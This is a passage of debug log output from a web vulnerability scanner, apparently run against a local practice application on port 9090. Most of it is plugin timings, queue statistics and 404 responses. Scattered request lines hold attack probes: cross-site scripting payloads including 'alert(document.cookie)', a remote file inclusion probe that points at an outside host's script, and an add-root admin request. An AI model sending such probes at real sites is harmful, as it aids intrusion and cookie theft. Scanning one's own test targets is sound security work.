http://localhost:9090/search.php?searchfor=\\"> returned HTTP code "404" (id=23135,from_cache=0,grep=1,rtt=0.05,did=nCjZyxHR) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2147. [Wed Feb 12 10:04:28 2020 - debug] strange_reason.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] cache_control.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] strange_headers.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] ssn.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] oracle.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] feeds.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] error_pages.grep(uri="http://localhost:9090/pics/") took 0.06s to run [Wed Feb 12 10:04:28 2020 - debug] localhost:9090 connection pool stats (free:120 / in_use:6 / max:50 / total:126) [Wed Feb 12 10:04:28 2020 - debug] Connections with more in use time: (7e4dfc38fb4774e9, 0.11 sec) (b39658db4f4f8bb7, 0.08 sec) (6941a0a978ef0bd6, 0.06 sec) (4eaba5d2159e1ff5, 0.03 sec) (ecece9365aff69d3, 0.02 sec) [Wed Feb 12 10:04:28 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11844, 'reject-seen-url': 5590, 'reject-out-of-scope': 216, 'accept': 4850} [Wed Feb 12 10:04:28 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11844, 'reject-seen-url': 5590, 'reject-out-of-scope': 216, 'accept': 4850} [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/ returned HTTP code "404" (id=23137,from_cache=0,grep=1,rtt=0.09,did=fpMlZTSp) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4444. [Wed Feb 12 10:04:28 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/pics/") took 0.10s to run [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2148. [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/webgais returned HTTP code "404" (id=23136,from_cache=0,grep=1,rtt=0.05,did=BqdSxzY3) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/update.dpgs returned HTTP code "404" (id=23138,from_cache=0,grep=1,rtt=0.09,did=Kj9XVXiX) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4444. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2149. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4445. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4446. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2150. [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/accounts/getuserdesc.asp returned HTTP code "404" (id=23139,from_cache=0,grep=1,rtt=0.18,did=Xd2qM2Ay) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/SetSecurity.shm returned HTTP code "404" (id=23140,from_cache=0,grep=1,rtt=0.13,did=qHp3sWmI) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/krysalis/ returned HTTP code "404" (id=23141,from_cache=0,grep=1,rtt=0.10,did=OmfdFKhv) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/admin.php?en_log_id=0&action=users returned HTTP code "404" (id=23142,from_cache=0,grep=1,rtt=0.02,did=DX5MLN34) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/troops.cgi returned HTTP code "404" (id=23143,from_cache=0,grep=1,rtt=0.06,did=7jSnlPLR) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~nobody4 returned HTTP code "404" (id=23146,from_cache=0,grep=1,rtt=0.14,did=2e39J56k) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/LiveHelp/ returned HTTP code "404" (id=23147,from_cache=0,grep=1,rtt=0.06,did=7G2csYax) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/plusmail returned HTTP code "404" (id=23148,from_cache=0,grep=1,rtt=0.14,did=zBlfXI1Y) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4447. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2151. [Wed Feb 12 10:04:28 2020 - debug] symfony.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] expect_ct.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] svn_users.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] private_ip.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] motw.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] meta_generator.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] retirejs.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/processit.pl returned HTTP code "404" (id=23144,from_cache=0,grep=1,rtt=0.05,did=cE8NxjWw) [Wed Feb 12 10:04:28 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:28 2020 - debug] serialized_object.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/icat returned HTTP code "404" (id=23149,from_cache=0,grep=1,rtt=0.11,did=lwn1O8DD) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/errors/needinit.php?GALLERY_BASEDIR=http://cirt.net/rfiinc.txt returned HTTP code "404" (id=23150,from_cache=0,grep=1,rtt=0.14,did=XLLsDnOn) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/a_security.htm returned HTTP code "404" (id=23145,from_cache=0,grep=1,rtt=0.17,did=vtpOvNpx) [Wed Feb 12 10:04:28 2020 - debug] file_upload.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] blank_body.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] credit_cards.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] websockets_links.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] csp.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] dom_xss.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] keys.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] clamav.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2152. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4448. [Wed Feb 12 10:04:28 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11864, 'reject-seen-url': 5590, 'reject-out-of-scope': 216, 'accept': 4855} [Wed Feb 12 10:04:28 2020 - debug] vulners_db.grep(uri="http://localhost:9090/05/") took 0.06s to run [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4449. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2153. [Wed Feb 12 10:04:28 2020 - debug] url_session.grep(uri="http://localhost:9090/05/") took 0.02s to run [Wed Feb 12 10:04:28 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] objects.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] error_500.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] meta_tags.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] password_profiling.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] click_jacking.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] lang.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/phpBB/phpinfo.php returned HTTP code "404" (id=23151,from_cache=0,grep=1,rtt=0.13,did=tcQlsAk7) [Wed Feb 12 10:04:28 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/05/") took 0.01s to run [Wed Feb 12 10:04:28 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4450. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2154. [Wed Feb 12 10:04:28 2020 - debug] localhost:9090 connection pool stats (free:129 / in_use:0 / max:50 / total:129) [Wed Feb 12 10:04:28 2020 - debug] There are no connections marked as in use in the connection pool at this time [Wed Feb 12 10:04:28 2020 - debug] error_pages.grep(uri="http://localhost:9090/05/") took 0.02s to run [Wed Feb 12 10:04:28 2020 - debug] strange_reason.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] cache_control.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] strange_headers.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] ssn.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] oracle.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] feeds.grep(uri="http://localhost:9090/05/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4451. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4452. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4453. [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/_vti_txt/ returned HTTP code "404" (id=23152,from_cache=0,grep=1,rtt=0.10,did=hqObKXf6) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/cgicso?query=AAA returned HTTP code "404" (id=23154,from_cache=0,grep=1,rtt=0.11,did=r3EBa93r) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/info2www returned HTTP code "404" (id=23156,from_cache=0,grep=1,rtt=0.13,did=tO5GtwDk) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/search.asp?term=<\x00script>alert(\'Vulnerable\') returned HTTP code "404" (id=23159,from_cache=0,grep=1,rtt=0.04,did=ZMXFTxrh) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/smssend.php returned HTTP code "404" (id=23160,from_cache=0,grep=1,rtt=0.07,did=zaleo1ch) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/include.php?path=contact.php&contact_email=\\"><=<=&script=>=>=&alert(document.cookie)=&/script= returned HTTP code "404" (id=23158,from_cache=0,grep=1,rtt=0.20,did=InnN6nfK) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/.thtml returned HTTP code "404" (id=23153,from_cache=0,grep=1,rtt=0.12,did=x71XYQIs) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/@TOMCATADMIN returned HTTP code "404" (id=23157,from_cache=0,grep=1,rtt=0.16,did=lpKU4H8s) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/webplus?about= returned HTTP code "404" (id=23155,from_cache=0,grep=1,rtt=0.11,did=tQ35hCPd) [Wed Feb 12 10:04:28 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/05/") took 0.08s to run [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4454. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4455. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2155. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4456. [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/web/ returned HTTP code "404" (id=23161,from_cache=0,grep=1,rtt=0.08,did=olUvjQgK) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2156. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4457. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2157. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4458. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4459. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2158. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4460. [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/officescan/hotdownload/ofscan.ini returned HTTP code "404" (id=23164,from_cache=0,grep=1,rtt=0.11,did=69NPgOTs) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/openautoclassifieds/friendmail.php?listing== returned HTTP code "404" (id=23163,from_cache=0,grep=1,rtt=0.09,did=h6hEGCHD) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts &a0=add&a1=root&a2=\\ returned HTTP code "404" (id=23162,from_cache=0,grep=1,rtt=0.12,did=8KlziEvl) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2159. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4460. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2160. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4460. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2161. [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~2yynw returned HTTP code "404" (id=23166,from_cache=0,grep=1,rtt=0.05,did=CTspoGkh) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/test.shtml?=x returned HTTP code "404" (id=23168,from_cache=0,grep=1,rtt=0.12,did=QapgafkP) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/cgi-lib.pl returned HTTP code "404" (id=23169,from_cache=0,grep=1,rtt=0.07,did=p6qpQidE) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/ammerum/ returned HTTP code "404" (id=23165,from_cache=0,grep=1,rtt=0.08,did=Yods6Yhm) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/view-source returned HTTP code "404" (id=23167,from_cache=0,grep=1,rtt=0.16,did=NsQrhPbN) [Wed Feb 12 10:04:28 2020 - debug] localhost:9090 connection pool stats (free:112 / in_use:17 / max:50 / total:129) [Wed Feb 12 10:04:28 2020 - debug] Connections with more in use time: (ba5ce6ea25405a8b, 0.10 sec) (3212c8070660fc94, 0.10 sec) (4eaba5d2159e1ff5, 0.10 sec) (6941a0a978ef0bd6, 0.09 sec) (ecece9365aff69d3, 0.08 sec) [Wed Feb 12 10:04:28 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:28 2020 - debug] ssi.audit(did="kMUP0kIv",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 5.67s to run [Wed Feb 12 10:04:28 2020 - debug] format_string.audit(did="0D3LQGQX", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:28 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:28 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:0D3LQGQX) [Wed Feb 12 10:04:28 2020 - debug] deserialization.audit(did="i0SErofK",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 4.67s to run [Wed Feb 12 10:04:28 2020 - debug] websocket_hijacking.audit(did="jXx3SUtg", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:28 2020 - debug] wordnet.discover(did="zwHwrKlb",uri="http://localhost:9090/learn/vulnerability/a7_xss") took 5.69s to run [Wed Feb 12 10:04:28 2020 - debug] payment_webhook_finder.discover(http://localhost:9090/learn/vulnerability/a7_xss, did=ni7vcH3l) [Wed Feb 12 10:04:28 2020 - debug] [payment_webhook_finder] Crawling "http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 10:04:28 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:28 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:28 2020 - debug] lfi.audit(did="iTMxNDM0",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 4.60s to run [Wed Feb 12 10:04:28 2020 - debug] shell_shock.audit(did="p2Vwuosf", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:28 2020 - debug] sqli.audit(did="eGrswoTj",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 4.57s to run [Wed Feb 12 10:04:28 2020 - debug] memcachei.audit(did="mj2ARJh1", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:28 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:28 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:mj2ARJh1) [Wed Feb 12 10:04:28 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:28 2020 - debug] generic.audit(did="1ipbPVGS",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 4.29s to run [Wed Feb 12 10:04:28 2020 - debug] un_ssl.audit(did="jeyWrbnK", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:28 2020 - debug] un_ssl.audit(did="jeyWrbnK",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] ldapi.audit(did="kt4vBVaT", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:28 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:28 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:kt4vBVaT) [Wed Feb 12 10:04:28 2020 - debug] Finished audit.phishing_vector (did=Nbkof1Fc) [Wed Feb 12 10:04:28 2020 - debug] phishing_vector.audit(did="Nbkof1Fc",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 4.57s to run [Wed Feb 12 10:04:28 2020 - debug] buffer_overflow.audit(did="WhzHihNJ", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:28 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:28 2020 - debug] find_captchas.discover(did="vgAGS40U",uri="http://localhost:9090/") took 7.73s to run [Wed Feb 12 10:04:28 2020 - debug] url_fuzzer.discover(http://localhost:9090/learn/vulnerability/a7_xss, did=a9V8Dl73) [Wed Feb 12 10:04:28 2020 - debug] [url_fuzzer] Crawling "http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/fcgi-bin/echo?foo= returned HTTP code "404" (id=23170,from_cache=0,grep=1,rtt=0.10,did=t0Zt57H3) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cleartrust/ct_logon.asp?CTLoginErrorMsg= returned HTTP code "404" (id=23171,from_cache=0,grep=1,rtt=0.04,did=hBsh3JJG) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/websendmail returned HTTP code "404" (id=23173,from_cache=0,grep=1,rtt=0.02,did=W6mmCF1L) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/pls/simpledad/admin_/dadentries.htm returned HTTP code "404" (id=23172,from_cache=0,grep=1,rtt=0.03,did=V8LrhKiq) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4461. [Wed Feb 12 10:04:28 2020 - debug] symfony.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] expect_ct.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] motw.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] meta_generator.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] retirejs.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] svn_users.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:28 2020 - debug] serialized_object.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] blank_body.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] credit_cards.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] websockets_links.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] csp.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] dom_xss.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] private_ip.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/COM returned HTTP code "404" (id=23175,from_cache=0,grep=1,rtt=0.10,did=OuYhzIW2) [Wed Feb 12 10:04:28 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] file_upload.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] websocket_hijacking.audit(did="jXx3SUtg",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.13s to run [Wed Feb 12 10:04:28 2020 - debug] redos.audit(did="6EttuRTu", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/logjam/showhits.php returned HTTP code "404" (id=23176,from_cache=0,grep=1,rtt=0.11,did=4MQPk0Q3) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/rpm_query returned HTTP code "404" 